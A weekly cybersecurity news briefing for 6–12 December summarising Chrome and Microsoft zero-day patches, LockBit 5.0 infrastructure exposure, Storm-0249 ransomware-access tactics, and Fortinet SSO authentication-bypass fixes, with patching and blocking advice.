Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Banking and Finance
Sports
Smart Cities
Cyber Security Weekly Briefing, 6-12 December
Google fixes actively exploited 0-day vulnerability in LibANGLE
Google has released emergency updates for Chrome that mitigate a high-severity zero-day vulnerability in the LibANGLE library, identified as a buffer overflow in the Metal renderer due to incorrect memory sizing.
The flaw allows memory corruption, information leaks, and potential arbitrary code execution. The fix is available in version 143.0.7499.x for Windows, macOS, and Linux, although its global rollout may be delayed. The vendor is keeping details restricted until most users apply the patch.
This incident brings the number of 0-day vulnerabilities exploited and fixed by Google in 2025 to eight, including previous flaws in V8, sandbox escape mechanisms, and exploits used in espionage and account hijacking operations. It is recommended to check for and apply the Chrome update immediately.
Microsoft security update fixes 57 vulnerabilities, including three zero-days
Microsoft has released Patch Tuesday for December 2025 with 57 vulnerabilities fixed, including one actively exploited zero-day and two publicly disclosed flaws. The batch includes 28 privilege escalation flaws, 19 remote code execution flaws, four information disclosure flaws, three denial of service flaws, and two spoofing flaws.
The exploited 0-day, CVE-2025-62221 (CVSSv3 7.8 according to the manufacturer), affects the Windows Cloud Files Mini Filter Driver and allows local elevation to SYSTEM privileges through a use-after-free. The publicly disclosed vulnerabilities include CVE-2025-64671 (CVSSv3 8.4 according to the manufacturer), which enables local command execution in Copilot for JetBrains by injecting commands through untrusted files or MCP servers, and CVE-2025-54100 (CVSSv3 7.8 according to the manufacturer), a flaw in PowerShell that allows code to be executed when Invoke-WebRequest processes malicious web content.
Microsoft has incorporated additional measures, such as security warnings when using Invoke-WebRequest, and attributes the discoveries to multiple external researchers and internal security teams.
LockBit 5.0 operational infrastructure exposure
Researcher Rakesh Krishnan has identified LockBit 5.0's key infrastructure, linking IP address 205.185.116.233 and domain karma0.xyz to its most recent leak site. The server, hosted on AS53667 (PONYNET/FranTech), displays a DDoS protection page labeled "LOCKBITS.5.0," confirming its operational function.
The domain, registered on April 12, 2025, with Namecheap privacy and Cloudflare DNS, maintains clientTransferProhibited status, indicating control retention measures. Host scans reveal multiple exposed services, including FTP (21), HTTP (80/5000/47001), WinRM (5985), a file server (49666), and, notably, RDP on port 3389, considered a critical vector for unauthorized remote access.
This leak coincides with the reactivation of LockBit 5.0, which incorporates support for Windows/Linux/ESXi, random extensions, geographic evasion, and accelerated encryption using XChaCha20. The exposure confirms recurring OPSEC deficiencies in the group. It is recommended to immediately block the domain and IP, in addition to monitoring associated activity.
Storm-0249 adopts advanced tactics to facilitate ransomware operations
ReliaQuest has identified a tactical shift in Storm-0249, an actor initially dedicated to access brokerage, toward more stealthy techniques aimed at preparing intrusions for ransomware affiliates.
The group employs domain spoofing, DLL sideloading, and fileless execution in PowerShell, including the ClickFix tactic to trick victims into executing malicious commands via Run.
The procedure downloads a script from a domain that mimics Microsoft and executes an MSI with SYSTEM privileges, which deploys a trojanized SentinelOne DLL for subsequent sideloading. Under legitimate processes, the actor executes native utilities such as reg.exe and findstr.exe to extract identifiers such as MachineGuid, used by families such as LockBit and ALPHV to link encryption keys to specific systems.
The use of living-off-the-land techniques and signed processes reduces detectability and evidences a shift from mass campaigns to precision attacks aimed at facilitating ransomware operations.
Fortinet fixes flaws that compromise authentication and credential management
Fortinet released security patches to fix two critical vulnerabilities affecting FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager. Identified as CVE-2025-59718 and CVE-2025-59719 (CVSSv3 9.8 according to the manufacturer), both vulnerabilities allow FortiCloud SSO authentication to be bypassed using manipulated SAML messages due to weak cryptographic validation.
Although the FortiCloud SSO feature is not enabled by default, it is automatically enabled when the device registers with FortiCare, unless the administrator manually disables the corresponding option. Fortinet recommends temporarily disabling SSO login to FortiCloud until the security patches are applied.
In addition, the company fixed other vulnerabilities: CVE-2025-59808 (CVSSv3 6.8 according to Fortinet), which allows passwords to be reset without requesting the current password if an attacker has already accessed the account, and CVE-2025-64471 (CVSSv3 7.5), which makes it possible to authenticate using a hash instead of a password.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
